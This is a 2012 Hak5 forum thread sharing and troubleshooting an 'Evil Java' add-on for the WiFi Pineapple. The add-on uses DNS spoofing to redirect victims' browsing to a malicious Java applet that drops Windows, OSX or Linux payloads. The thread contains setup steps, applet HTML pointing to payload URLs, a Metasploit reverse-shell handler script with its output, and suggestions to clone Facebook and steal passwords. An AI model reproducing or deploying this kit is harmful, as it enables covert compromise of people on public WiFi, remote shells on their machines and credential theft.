reflex Posted February 7, 2012 Share Posted February 7, 2012 (edited) Edit : Uploaded again to fix the run.html pointing to the comp rather than itself.Thanks Whistle Master. EDIT : Im such a noob, i uploaded the files but not the ones id been working on, the index.html was meant to named run.html. Have renamed them and posted new link. Everything should be working fine now Hi Hak5 community, thought i would post this and give something back for once. Ive added and option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux which is selected depending on there OS (Victim needs to have Java installed). Screens http://i.imgur.com/z5uHj.png http://i.imgur.com/tgtGH.png http://i.imgur.com/nM8KU.png http://i.imgur.com/VUkJd.png http://i.imgur.com/KWMfA.jpg http://i.imgur.com/PWfrT.jpg SETUP 1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l 2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option. 3. Copy the "java" folder to /www/ 4. Click Conf next to the "Evil Java" option for commands to setup listeners. 5. Enable "Evil Java" and sit back. ABOUT All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome). All payloads are set to connect back to 172.16.42.42 so make sure thats your IP. Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2 Have Fun ;) Reflex! Edited March 17, 2012 by reflex Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 7, 2012 Share Posted February 7, 2012 Another option could be run S.E.T. and setup the java applet attack and just do a line or two in the redirect.php or DNS for specific sites (facebook, gmail, etc.) But I may check this out. Quote Link to comment Share on other sites More sharing options...
reflex Posted February 7, 2012 Author Share Posted February 7, 2012 (edited) Yeh, but its actually hosted on the pineapple so no messing about with set, just a flick of a switch and copy n paste the commands in the Conf, or even better download this script http://www.mediafire.com/?hso7cx01cvgmffm and run "msfconsole -r pineapplepwn.rc" Edited February 7, 2012 by reflex Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted February 7, 2012 Share Posted February 7, 2012 Awesome stuff reflex! Thanks for contributing to the project :) Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted February 11, 2012 Share Posted February 11, 2012 Hi reflex! Just a quick question: I had a look on file run.html and I was wondering why the values of the Java Applet are pointing on 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no? <applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar"> <param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5"> <param name="STUFF" value=""> <param name="OSX" value="http://172.16.42.42:80/mac.bin"> <param name="LINUX" value="http://172.16.42.42:80/nix.bin"> Thanks ! Quote Link to comment Share on other sites More sharing options...
reflex Posted February 12, 2012 Author Share Posted February 12, 2012 Hi reflex! Just a quick question: I had a look on file run.html and I was wondering why the values of the Java Applet are pointing on 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no? <applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar"> <param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5"> <param name="STUFF" value=""> <param name="OSX" value="http://172.16.42.42:80/mac.bin"> <param name="LINUX" value="http://172.16.42.42:80/nix.bin"> Thanks ! Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The Payloads are on the pineapple. Set your ip to 172.16.42.42 then click Conf and copy paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run the payload will connect back to 172.16.42.42. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted February 12, 2012 Share Posted February 12, 2012 Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The Payloads are on the pineapple. Set your ip to 172.16.42.42 then click Conf and copy paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run the payload will connect back to 172.16.42.42. I did read the instructions but the attack was not working correctly... According to SEC blog: The applet has to read the operating system specific payload path and the url of the next page to show from it parameters. Then it will check on which platform it is currently running and start to download a specific payload using the browser it runs under. With your run.html file, the applet cannot download the specific payloads from IP 172.16.42.42 (except if you are running a web server delivering the payloads) as they are on the pineapple 172.16.42.1 and in the folder /www/java/ I therefore modified your run.html to the following and it works perfectly: <applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar"> <param name="WINDOWS" value="http://172.16.42.1:80/java/Qf8IYZJlKNMdl5"> <param name="STUFF" value=""> <param name="OSX" value="http://172.16.42.1:80/java/mac.bin"> <param name="LINUX" value="http://172.16.42.1:80/java/nix.bin"> Quote Link to comment Share on other sites More sharing options...
telot Posted February 12, 2012 Share Posted February 12, 2012 Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Heres my scenario: Fresh reflash to 2.1.2 Run wp3.sh Copy java to /www/ on the pineapple Copy contents of pineapple/ to /www/pineapple, overwriting all Browse to 172.16.42.1/pineapple Start karma Click Conf for java attack Copy/paste windows attack into my BT5 terminal Wait for it to load Go back to mainpage for pineapple (Status) Click "Start" for java attack And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Masters modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated. Thanks! telot Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted February 12, 2012 Share Posted February 12, 2012 (edited) Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Heres my scenario: Fresh reflash to 2.1.2 Run wp3.sh Copy java to /www/ on the pineapple Copy contents of pineapple/ to /www/pineapple, overwriting all Browse to 172.16.42.1/pineapple Start karma Click Conf for java attack Copy/paste windows attack into my BT5 terminal Wait for it to load Go back to mainpage for pineapple (Status) Click "Start" for java attack And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Masters modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated. Thanks! telot You also have to start DNS Spoof for this attack. The enable "Evil Java" action does the following: - Change the DNS Spoof settings to redirect all sites to the pineapple; - Change the landing page. But you can do it manualy: Go to Configuration: - Edit DNS Spoof Host to capture all hosts: 172.16.42.1 * - Edit Landing Page (phishing) to change redirection: to content=“0;url=/java/run.html” EDIT: I added a guide on the wiki Edited February 12, 2012 by Whistle Master Quote Link to comment Share on other sites More sharing options...
reflex Posted February 14, 2012 Author Share Posted February 14, 2012 (edited) The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echos the word "up" into it. That way the pineapple can tell when its on. When you stop it echos "" into it telling it its off. Check that the file up is in the pineapple dir and that its say up by "cat up" command when you have started the Evil Java.Thanks to Whistle Master for noticing that in the run.html have uploaded again and this time shouldbe fixed. Edited February 14, 2012 by reflex Quote Link to comment Share on other sites More sharing options...
telot Posted February 17, 2012 Share Posted February 17, 2012 The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echos the word "up" into it. That way the pineapple can tell when its on. When you stop it echos "" into it telling it its off. Check that the file up is in the pineapple dir and that its say up by "cat up" command when you have started the Evil Java.Thanks to Whistle Master for noticing that in the run.html have uploaded again and this time shouldbe fixed. I think we need some consistency here with this new Java attack. Theres lots of conflicting claims and none of them have been working for me. Anyone else having problems? I'm sure theres many ways to skin this cat. Reflex, since you discovered/initially designed this, could you do a once over on your instructions and fill in some gaps for us? Maybe I'm just a noob, but I'm having multiple issues and errors when trying to implement either solution (yours or Whistle Masters). Thanks for any help you can spare telot Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted February 17, 2012 Share Posted February 17, 2012 Telot, can you tell us at which step you are blocked ? Try to login on the pineapple through SSH to see if you have all the files in the www folder: ls -la /www/ && ls -la /www/java/ Did you try my instruction on the wiki ? Quote Link to comment Share on other sites More sharing options...
telot Posted February 19, 2012 Share Posted February 19, 2012 Alrighty - sorry for the delay in my response, but I've been traveling the country and forgot my pineapple at home :( Here is the output of the ls -la commands: root@Pineapple:~# ls -la /www/ && ls -la /www/java/ drwxrwxr-x 1 root root 0 Jan 1 00:03 . drwxr-xr-x 1 root root 0 Jan 1 00:02 .. -rw-rw-r-- 1 root root 616 Jan 26 2012 error.php -rw-rw-r-- 1 root root 106 Jan 1 00:07 index.php drwxr-xr-x 2 root root 0 Jan 1 00:03 java drwxrwxr-x 1 root root 0 Jan 1 00:04 pineapple -rw-rw-r-- 1 root root 214 Jan 26 2012 redirect.php drwxr-xr-x 2 root root 0 Jan 1 00:03 . drwxrwxr-x 1 root root 0 Jan 1 00:03 .. -rw-r--r-- 1 root root 73802 Jan 1 00:03 Qf8IYZJlKNMdl5 -rw-r--r-- 1 root root 4124 Jan 1 00:03 Signed_Update.jar -rwxr-xr-x 1 root root 20800 Jan 1 00:03 mac.bin -rw-r--r-- 1 root root 134 Jan 1 00:03 nix.bin -rw-r--r-- 1 root root 14862 Jan 1 00:03 run.html Looks about right by me. My DNS Spoof Host box under Configuration on the pineapple reads as follows: 172.16.42.1 * My Landing Page, again under Configuration on the pineapple is as follows: <html> <head> <meta http-equiv="REFRESH" content=“0;url=/java/run.html”> </head> <body> </body> </html> I start karma and start DNS Spoof from the Status page of the pineapple. Then I download/unzip pineapplepwn.rc msf script and open a terminal and run msfconsole -r pineapplepwn.rc and here is the output: root@root:~/Desktop# msfconsole -r pineapplepwn.rc [-] Failed to connect to the database: FATAL: no pg_hba.conf entry for host "172.16.42.249", user "msf3", database "msf3" {"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"eccd8310", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5} ["/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `connect'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:217:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `postgresql_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:223:in `new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:245:in `checkout_new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:188:in `block (2 levels) in checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `loop'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `block in checkout'", "/opt/framework/ruby/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:183:in `checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:98:in `connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:326:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:123:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:115:in `connection'", "/opt/framework/msf3/lib/active_record/base.rb:1271:in `columns'", "/opt/framework/msf3/lib/active_record/base.rb:1284:in `column_names'", "/opt/framework/msf3/lib/active_record/base.rb:1297:in `column_methods_hash'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `block in all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `each'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1842:in `method_missing'", "/opt/framework/msf3/lib/msf/core/model/workspace.rb:69:in `default'", "/opt/framework/msf3/lib/msf/core/db.rb:189:in `default_workspace'", "/opt/framework/msf3/lib/msf/core/db_manager.rb:166:in `connect'", "/opt/framework/msf3/lib/msf/ui/console/driver.rb:186:in `initialize'", "/opt/framework/msf3/msfconsole:130:in `new'", "/opt/framework/msf3/msfconsole:130:in `<main>'"] Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f EFLAGS: 00010046 eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 ds: 0018 es: 0018 ss: 0018 Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) Stack: 90909090990909090990909090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090.90909090.09090900 90909090.90909090.09090900 .......................... cccccccccccccccccccccccccc cccccccccccccccccccccccccc ccccccccc................. cccccccccccccccccccccccccc cccccccccccccccccccccccccc .................ccccccccc cccccccccccccccccccccccccc cccccccccccccccccccccccccc .......................... ffffffffffffffffffffffffff ffffffff.................. ffffffffffffffffffffffffff ffffffff.................. ffffffff.................. ffffffff.................. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00 Aiee, Killing Interrupt handler Kernel panic: Attempted to kill the idle task! In swapper task - not syncing =[ metasploit v4.0.0-release [core:4.0 api:1.0] + -- --=[ 716 exploits - 361 auxiliary - 68 post + -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13462 updated 202 days ago (2011.08.01) Warning: This copy of the Metasploit Framework was last updated 202 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306 resource (pineapplepwn.rc)> use multi/handler resource (pineapplepwn.rc)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (pineapplepwn.rc)> set LHOST 172.16.42.42 LHOST => 172.16.42.42 resource (pineapplepwn.rc)> set LPORT 443 LPORT => 443 resource (pineapplepwn.rc)> set ExitOnSession false ExitOnSession => false resource (pineapplepwn.rc)> exploit -j [*] Exploit running as background job. resource (pineapplepwn.rc)> use multi/handler resource (pineapplepwn.rc)> set PAYLOAD osx/x86/shell_reverse_tcp PAYLOAD => osx/x86/shell_reverse_tcp resource (pineapplepwn.rc)> set LHOST 172.16.42.42 LHOST => 172.16.42.42 resource (pineapplepwn.rc)> set LPORT 8080 LPORT => 8080 resource (pineapplepwn.rc)> set InitialAutoRunScript post/osx/gather/enum_osx InitialAutoRunScript => post/osx/gather/enum_osx resource (pineapplepwn.rc)> set ExitOnSession false ExitOnSession => false resource (pineapplepwn.rc)> exploit -j [-] Handler failed to bind to 172.16.42.42:443 [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler... [*] Exploit running as background job. resource (pineapplepwn.rc)> use multi/handler resource (pineapplepwn.rc)> set PAYLOAD linux/x86/shell/reverse_tcp PAYLOAD => linux/x86/shell/reverse_tcp resource (pineapplepwn.rc)> set LHOST 172.16.42.42 LHOST => 172.16.42.42 resource (pineapplepwn.rc)> set LPORT 8081 LPORT => 8081 resource (pineapplepwn.rc)> set ExitOnSession false ExitOnSession => false resource (pineapplepwn.rc)> exploit -j [-] Handler failed to bind to 172.16.42.42:8080 [*] Started reverse handler on 0.0.0.0:8080 [*] Starting the payload handler... [*] Exploit running as background job. [-] Handler failed to bind to 172.16.42.42:8081 [*] Started reverse handler on 0.0.0.0:8081 [*] Starting the payload handler... msf exploit(handler) > Now as I've said before, I'm a total metasploit noob. I'm only on the second chapter of securitytube's megaprimer on it. But even as a noob this output does not look good. Many fatal exceptions and Failed to binds. Pressing forward regardless, I connect my target machine to its Karma'd pineapple AP of Caribou (a local coffee shop's wifi). Which by the way, Windows7 pops up with a "Additional log on information may be required" bubble. Ignoring this I open Firefox and browse to www.facebook.com and get a white page that says "No such file or directory" and in the address bar is www.facebook.com/java/run.html" (with that end quote). Not only that, but when my attacking machine tries to browse the internet, it goes to www.hak5.org/run/java.html" - so the DNS spoof spoofed the attacking machines DNS as well?! This is the first time I've played with DNS spoof, so my noobery is again rearing its ugly head. Is it a problem with DNS Spoof? Is it a problem with the msf script? Did I make some noob mistake? Most likely I'm sure :) Any ideas or further advice would be greatly appreciated. Thanks very much! telot Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted February 20, 2012 Share Posted February 20, 2012 You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources: svn update Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ") Try to replace your landing page configuration with the following (with correct ones): <html> <head> <meta http-equiv="REFRESH" content="0;url=/java/run.html"> </head> <body> </body> </html> Quote Link to comment Share on other sites More sharing options...
telot Posted February 23, 2012 Share Posted February 23, 2012 You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources: svn update Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ") Try to replace your landing page configuration with the following (with correct ones): <html> <head> <meta http-equiv="REFRESH" content="0;url=/java/run.html"> </head> <body> </body> </html> Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master telot Quote Link to comment Share on other sites More sharing options...
d3cryption Posted February 25, 2012 Share Posted February 25, 2012 Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master telot telot did you ever get the disable problem fixed? if so, what fixed it.. i'm having the same problem.... Quote Link to comment Share on other sites More sharing options...
telot Posted February 25, 2012 Share Posted February 25, 2012 telot did you ever get the disable problem fixed? if so, what fixed it.. i'm having the same problem.... Nope - havent gotten a chance to test it out till today. I will report my results this afternoon or tomorrow morning. I def want to get this working!! telot Quote Link to comment Share on other sites More sharing options...
RebelCork Posted March 18, 2012 Share Posted March 18, 2012 Edit : Uploaded again to fix the run.html pointing to the comp rather than itself.Thanks Whistle Master. EDIT : Im such a noob, i uploaded the files but not the ones id been working on, the index.html was meant to named run.html. Have renamed them and posted new link. Everything should be working fine now Hi Hak5 community, thought i would post this and give something back for once. Ive added and option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux which is selected depending on there OS (Victim needs to have Java installed). Screens http://i.imgur.com/z5uHj.png http://i.imgur.com/tgtGH.png http://i.imgur.com/nM8KU.png http://i.imgur.com/VUkJd.png http://i.imgur.com/KWMfA.jpg http://i.imgur.com/PWfrT.jpg SETUP 1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l 2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option. 3. Copy the "java" folder to /www/ 4. Click Conf next to the "Evil Java" option for commands to setup listeners. 5. Enable "Evil Java" and sit back. ABOUT All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome). All payloads are set to connect back to 172.16.42.42 so make sure thats your IP. Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2 Have Fun ;) Reflex! do you still need the extra script to run the in metasploit? Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted March 19, 2012 Share Posted March 19, 2012 The extra script is only to simplify your life when setting up the attack :) I uploaded it again and edited the wiki. Quote Link to comment Share on other sites More sharing options...
techsavvy34 Posted March 20, 2012 Share Posted March 20, 2012 Does anyone know if this will work on the pineapple mark iv? Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted March 20, 2012 Share Posted March 20, 2012 It does. It just a matter of redirecting all sites in the dns spoof configuration to the java index.html file. Quote Link to comment Share on other sites More sharing options...
RebelCork Posted March 20, 2012 Share Posted March 20, 2012 Does anyone know if this will work on the pineapple mark iv? The attack itself will work on mkiv, although the index.php file that is included in the package should not be uploaded. Instead you can backup your existing index.php file in the pineapple folder before making any changes: cp index.php index.bak Open the one from the package above (MKIII) , copy the following code and paste it into the php segment of your MKIV index.php file $isjavaup = exec("cat up"); if ($isjavaup != "") { echo "Evil Java is currently <font color=\"lime\"><b>enabled</b></font>. | <a href=\"stopjava.php\"><b>Stop</b></a><br />"; } else { echo "Evil Java is currently <font color=\"red\"><b>disabled</b></font>. | <a href=\"startjava.php\"><b>Start</b></a> | <a href=\"conf.php\"><b>Conf</b></a><br/>"; } Reboot your pineapple, and you should see the Evil Java option. Change your landing page to redirect to /java/run.html So far on my tests, this has worked for me, with access to metasploit working. The only thing is, the switch status (on/off) does not work I hope that helps, but I'm a metasploit newbie myself! Quote Link to comment Share on other sites More sharing options...
killuminati Posted March 20, 2012 Share Posted March 20, 2012 Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interace with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know ur on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but theres an issue with the switch showing "on"? Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (I.e airmon-ng, urlsnarf, arp) Quote Link to comment Share on other sites More sharing options...
RebelCork Posted March 21, 2012 Share Posted March 21, 2012 (edited) Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interace with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know ur on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but theres an issue with the switch showing "on"? Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (I.e airmon-ng, urlsnarf, arp) I think ngrep and urlsnarf aren't 100% functional on MKIV. (Sebkinne says: ngrep is not installed currently) (Thought so: :) ) I thinks it's in the list of to fix for next release of firmware, if i'm right. see this thread: MKIV - What we know and don't know Projects on the collective to do list and issues that need attending: Network Pineapple Monkey - Seb has acknowledged its on his list and will become higher priority after 1.0.1 firmware is released. See this thread: Adding Alfa AWUS036H to the Mark4: Darren commented: "...adding a 2nd WiFi Adapter, say with an AWUS036H, seems as likely as adding 3G -- so tethering is on the table." Official current status on getting it to work is unknown. During my trials, the Mark4 recognizes the realtek rtl8187 but does not assign it as a wlan adapter. Openwrt should have support for it through kmod-rtl8187 Combining storage and 3G connectivity in one card: "Two birds, one stone". Many 3G usb cards have microSD slots. Novatel U760 is a prime example. Darren and hfam both have these cards and seem to be working on it. Ngrep is gone now and accessible only via SSH. (See: http://hak5.org/tag/ngrep for information on how to ngrep via terminal)(Sebkinne edit: It is gone. Dead. For now ) URLsnarf is missing from the UI page, but is also accessible via SSH. Darren's comment on the matter: "We're working on a revised web UI for sniffing which should bring together the power of urlsnarf, ngrep and *ettercap" Swoot! Reaver is not present on Schmoocon version but will be via firmware update 1.0.1. Reaver has not yet been proven to work - a proper how to guide is needed. Issue lies with mon.wlan0 - what is it used for? Can we remove it and add a proper mon0? Do we need to? Will it affect Karma as I suspect? (I'm going to try my hand at it today!) Further 3G Dongle research - Darren's hints for us regarding 3G dongles: "Usually it's just a matter of "ejecting" the USB CD-ROM so that the modem reveals itself, at which point a bunch of uci network commands set the config, pppd does its thing with chat and comgt." - Need to clarify ejecting the usb cd-rom... Add support for encrypting USB drives using EncryptingFS or perhaps even truecrypt? Enable airdrop-ng support by installing python and other dependencies to usb drive telot Edited March 21, 2012 by RebelCork Quote Link to comment Share on other sites More sharing options...
RebelCork Posted March 21, 2012 Share Posted March 21, 2012 However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but theres an issue with the switch showing "on"? DNS Spoof is running and you have the run.html offering up a java attack applet.It will run constantly, you can't turn it off without replacing the redirected page. If you really wanted to, you could try altering an existing web page to inject the java code for the user instead of a blank page. For example, clone www.facebook.com and insert the code into the webpage. That way, when your victim machine browses to the infected page the script is run automatically and they are not sitting looking at a blank screen. Also a particulairly nasty attack would be to disguise the attack vector as one of the many popular FB games. With an active internet connection to the pineapple, the victim will continue on his/her way to the login page, and you get the chance to steal passwords as well. These are some of the theoretical situations I am trying to defend against. (I am trying to write a term paper for college on MITM attacks) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.